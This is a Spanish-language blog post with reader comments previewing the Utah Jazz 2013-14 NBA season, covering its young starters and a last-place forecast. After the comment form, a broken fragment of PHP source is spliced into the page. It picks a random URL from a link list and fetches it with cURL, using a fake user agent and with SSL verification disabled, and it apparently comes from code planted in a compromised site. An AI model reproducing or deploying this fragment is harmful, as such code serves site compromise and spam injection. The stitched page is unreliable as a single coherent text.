Utah Jazz: Borrón y cuenta nueva

09 de October de 2013 por Esteban

Lo decíamos en la previa de la temporada anterior: los Jazz debían mejorar lo realizado en la 2011/2012 para lograr una continuidad. Al equipo que se metió por la ventana en aquellos PO y que fue barrido por los Spurs le dieron una segunda oportunidad para demostrar un progreso. De no haberlo se apretaría el botón de reset. Se mejoró el núcleo con las llegadas de los Williams, Mo y Marvin, y se confió en el desarrollo de sus jóvenes  a fin de comprobar si la senda recorrida era la correcta y se podía aspirar al menos a una segunda ronda. Esto no sucedió. Aunque permanecieron en PO gran parte del año, los Lakers les robaron su lugar en los últimos partidos y la temporada, más allá de las victorias logradas, debía considerarse un fracaso. Además, sus jóvenes no se estaban desarrollando lo esperado en medio de tan dura competencia y eran tapados por jugadores de mayor experiencia y jerarquía.

De ahí que desde la gerencia hayan decidido hacer borrón y cuenta nueva de una forma hasta violenta. Los expirings de jugadores de buen nivel como Mo Williams, Al Jefferson y Paul Millsap en teoría valían más que dejarlos libres a cambio de nada. Se especuló mucho con algún trade pero venderlos significaba traer algún otro jugador que podía complicar la situación futura de la franquicia. Pôr estos motivos decidieron cortar y dejaron a todos libres, ni una ronda a cambio de ellos. Extraño sobretodo si hablamos de la dupla de internos que tan bien les habían rendido. Tanto que Corbin nunca logró encontrar los minutos necesarios para el desarrollo de Favors y Kanter. Competir y desarrollar jóvenes a la vez es algo muy difícil. Los Jazz no lo consiguieron y han decidido dejar de competir por PO a fin de que jueguen finalmente esos  jovencitos que tanto prometen.

Así que arrancan de nuevo pero no de cero sinó con algo de camino recorrido. Sus chicos no son tan jóvenes y parecen preparados para pasar a la acción. 

A día de hoy, los Jazz tienen el mejor núcleo joven de la liga, por lo que el reto será mayúsculo. Si ese grupo de jugadores se desarrolla como se espera pero pierden suficientes partidos como para ir por Wiggins, estaríamos hablando de un equipo con aspiraciones de campeón a 3 o 4 años vista. La apuesta es clara. Burke, Burcks, Hayward, Favors y Kanter deben demostrar que pueden alcanzar el potencial que se les atribuye.  Son cinco jugadores suficientemente diferentes como para poder complementarse perfectamente entre si y convertirseun núcleo muy sólido a la espera de la estrella que debería llegar en el próximo draft.

Analicemos a cada uno de ellos:

Trey Burke será el rookie pero saldrá como base titular y contará con minutos suficientes para pelear por el ROY. Muy valorado por todos, ha dejado grandes dudas de su nivel en la liga de verano, donde lució verdaderamente mal, sobre todo con un patético tiro de tres puntos. Para algunos es el nuevo Lillard pero tengo mis dudas sobre eso. De todas maneras, en el peor de los casos, dado que es un hombre competitivo y con buena ética de trabajo, podrá convertirse en un sólido base  titular.

En la posición de escolta debería salir de titular Alec Burks o al menos eso esperan desde los despacho. De no responder Burks a la confianza, la alternativa sería jugar con Hayward de escolta y Jefferson o Williams de alero. Burks tiene fuerza, defensa y agilidad, lanza bien desde el dribbling y posee un gran talento ofensivo. Pinta a sexto hombre revulsivo, estilo JR Smith. Sus números por 36 minutos permiten afirmar que puede ser candidato al MIP, pues si le dan suficiente libertad podría llegar a promediar hasta 15 puntos por juego. Esta frente a su oportunidad y yo personalmente creo mucho en él.

Como alero saldría Gordon Hayward (más escolta que alero, realmente). El más crecido de todos ya que jugó un buen año rookie y el año pasado fue titular y pieza clave del equipo. Sin dudas un jugador muy útil pero lejos de ser una estrella que pueda llevar por si mismo el equipo a grandes cotas. Una segunda espada de lujo. Tiene muchos fundamentos, entiende el juego, defiende bien, tiene buen tiro y sabe penetrar, es inteligente y tiene buena ética de trabajo. ¿Será alguna vez all-star? Quizá. Es la encarnación de Ginobili. Otro que con más responsabilidades puede ser candidato al jugador mas mejorado. Los 16 ó 19 puntos por juego son posibles para este chico.

Como ala-pivot, la pseudo estrella del equipo, Derrick Favors. Todos las miradas apuntan hacian él y si no promedia cerca de un 20-10 sera prácticamente un fracaso. Si decimos que Burks y Hayward pueden ser candidatos al MIP, qué decir de Favors a quien solo le falta la oportunidad de jugar de titular muchos minutos para ser una estrella de la liga. No es que sea ágil, es que es muy ágil y no es fuerte sinó muy fuerte. Defiende y rebotea como un interno de élite y en ataque, aunque no sobresale mucho acaba sacando sus puntos. Sin dudas tenemos anet nosotros a un potencial all-star. Sale de la sombra de Jefferson y Millsap para ser sensación. Parece mucho, pero este año debería estar en los 17/18 puntos y 10/11 rebotes.

Y para completar el cuarteto de candidatos al MIP, Enes Kanter. Sus números cada 36 minutos asustan. En el pívot turco podríamos presenciar un progreso similar al de Nikola Vucevic del año pasado. Kanter es uno de los mejores reboteadores de toda la NBA así que siendo titular debería estar en promedios de 11 o 12 rebotes por juego. En ataque es una incógnita debido a los pocos minutos de los que disfrutó la pasada campaña. Es difícil saber si puede ser un anotador como se intuye o solo será una roca fuerte bajo los aros.

Del resto poco que comentar poque no van a intentar ganar partidos e incluso por su propio bien deberían perder el mayor número posible. Las adiciones de Andris Biedrins y Richard Jefferson solo suponen unos buenos expirings. Algo más útil pueden resultar Brandon Rush que venía jugando realmente bien antes de su dura lesión, y Jeremy Evans que cuajó unas buenas ligas de verano.

En síntesis, 5 jóvenes con un pinta espectacular, todos muy buenos y compatibles y con la edad y experiencia necesarias para rendir a gran nivel. A pesar de ellos, los Jazz serán un equipo pésimo debido a la horrible banca de la que disponen. No podrán tolerar ninguna lesión de su cinco inicial pues si se lesiona, por ejemplo, Kanter, su sustituto sería… ¡Biedrins! Perderán muchos juegos pero eso es algo con lo que todos cuentan (y no pocos desean).

Pronóstico: 14º del Oeste (24-58)

Comenta

9 comentarios a esta entrada

  1. Denise dice:
    #1

    El analisis está bien pero si hablamos de nucleo joven falta por nombrar a la guinda del pastel, Rudy Gobert. El frances de 21 años con sus 2’18 de altura y mas de 2’30 de envergadura debe ser un pivot muy importante en los proximos años. Yo tengo mucha confianza en él, para esta temporada aun estará verde pero a poco que gane musculo y le enseñen algunos fundamentos en ataque, es un tio claramente All-Star porque el fisico para rebotear, taponar e intimidar ya lo trae de fabrica.
    Hay quienes dicen que pasará el año en la D-League, yo no lo creo, teniendo en cuenta la plantilla de los Jazz y que su objetivo se limita a desarrollar jovenes y hacer tanking, que al francés le dieran menos de 15 minutos por noche me parecería un error.
    Burke me parece un gran acierto, cierto es que no ha demostrado nada en la Summer League y que se trata de un base undersized para la NBA, pero tiene una pinta escandalosa de jugón y me estoy jugando en las porras que será Rookie del año por delante de Oladipo que es el que encabeza la mayoria de las votaciones y encuestas que veo.
    Del amigo Machado tambien espero que se consolide como segundo base del equipo por delante de John Lucas y del que ya no espero nada es de Marvin Williams, uno de los mayores bluffs de los ultimos años. Visto ahora, parece mentira que este hombre pudiera ser elegido antes que Deron y que Paul.

    Yo tambien veo a los Jazz últimos del Oeste y penultimos de la liga por detrás de los 76ers, pero veo dificil que los mormones superen las 20 victorias.

      Citar

  2. HisRoyalAirness dice:
    #2

    Muy buen análisis pero se me ha relajado un poco el esfínter con lo de que Hayward es la encarnación de Manudona. Seriously?

      Citar

  3. txusma dice:
    #3

    Denise:
    a poco que gane musculo y le enseñen algunos fundamentos en ataque, es un tio claramente All-Star porque el fisico para rebotear, taponar e intimidar ya lo trae de fabrica.

    Cuantas veces habremos oido frases parecidas? Todo tío grande drafteado por un equipo NBA trae el físico de fábrica. Hay auténticas bestias pardas que no han hecho nunca nada en la NBA o que han pasado con más pena que gloria.

    No sé. De momento soy muy escéptico con este hombre. De momento creo que va a ser carne de D-League o no jugará más de 10 min. por partido.

      Citar

  4. Esteban dice:
    #4

    txusma: Cuantas veces habremos oido frases parecidas? Todo tío grande drafteado por un equipo NBA trae el físico de fábrica. Hay auténticas bestias pardas que no han hecho nunca nada en la NBA o que han pasado con más pena que gloria.

    No sé. De momento soy muy escéptico con este hombre. De momento creo que va a ser carne de D-League o no jugará más de 10 min. por partido.

    que tenga fisico como para algun dia ser una estrella no es que lo sea, es mas dudo que juegue 10 minutos por noche en este equipo, por lo que no entra en el analisis

    si algun dia es gobert es bueno y es un jugador util para este equipo, se mencionara, hoy es carne de liga de desarrollo

      Citar

  5. Esteban dice:
    #5

    HisRoyalAirness:
    Muy buen análisis pero se me ha relajado un poco el esfínter con lo de que Hayward es la encarnación de Manudona. Seriously?

    no spolo es igual de piel y usa el mismo numero, tiene los mismo fundamentos y la misma inteligencia

      Citar

  6. Denise dice:
    #6

    txusma: Cuantas veces habremos oido frases parecidas? Todo tío grande drafteado por un equipo NBA trae el físico de fábrica. Hay auténticas bestias pardas que no han hecho nunca nada en la NBA o que han pasado con más pena que gloria.

    No sé. De momento soy muy escéptico con este hombre. De momento creo que va a ser carne de D-League o no jugará más de 10 min. por partido.

    Ok, todo lo grande son bestias, pero este tio es distinto, ese fisico portetntoso, esos brazos largos interminables, los muelles y esa agilidad para correr la pista no la tiene todo el mundo. Esmuy dificil encontrar un jugador de esas características.
    Y si con la mierda equipo y objetivo (tanking) que tienen los Jazz, en el puesto de C que solo tienen a Kanter, Gobert y Biedrins, si al francés no le dan 15 minutos por partido, yo despediría inmediatamente al entrenador. A la p..calle.
    Hombreee, tienes ahí a un tio que a medio plazo te puede hacer estragos y marcarte la diferencia … ¿y lo vais a mandar a la D-League sin darle confianza y minutos? Para un tio que está verde como Gobert, lo mejor es darle minutos y que se codee con los mas grandes. Asi es como se aprende y como crece uno como jugador.
    Como digo, el daria unos 15 minutillos, y creo que el hombrecillo podría aportar sus 5-6 puntitos a base de mates, sus 5 rebotitos y una buena chapa.

      Citar

  7. Heineken dice:
    #7

    El entrenador de Utah salió hace poco diciendo que Gobert le había sorprendido gratamente y que contaría con minutos.

      Citar

  8. portu dice:
    #8

    La apuesta ya está hecha, pues ahora a apechugar y a cumplirlo al 100%, Gobert por delante de Biedrins, a no ser que se prefiera dar algunos minutos a los expiring como Biedrins por si lo hacen bien y algún equipo pueda necesitarlos a cambio de alguna rondilla, quizás tb por Marvin Williams…
    En cualquier caso, de momento el proyecto no me parece compensado en cuanto a talento. Es muy diferente el potencial de Kanter y Favors al de Burks o Hayward. Para mi los 2 últimos no pasan de jugadores correctos, incluso no sabría decir si Burks llega a eso. A Burke no lo he visto lo suficiente para opinar, pero coincido en q tampoco estaría mal q fuese un base correcto. A mi me recuerda a Kemba Walker.
    Para pensar en un proyecto ilusionante de verdad necesitan a un tío exterior de nivel similar a Kanter/Favors, aparte de algunos complementos de banquillo q ya irán cazando por la travesía por el desierto q han iniciado.

      Citar

  9. Denise dice:
    #9

    Dos apuntes en los Jazz:

    – Trey Burke fuera de las pista entre 2 y 3 meses por una fractura en el dedo indice.
    – Derrick Favors renueva por 4 años y 49 millones de dolares.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>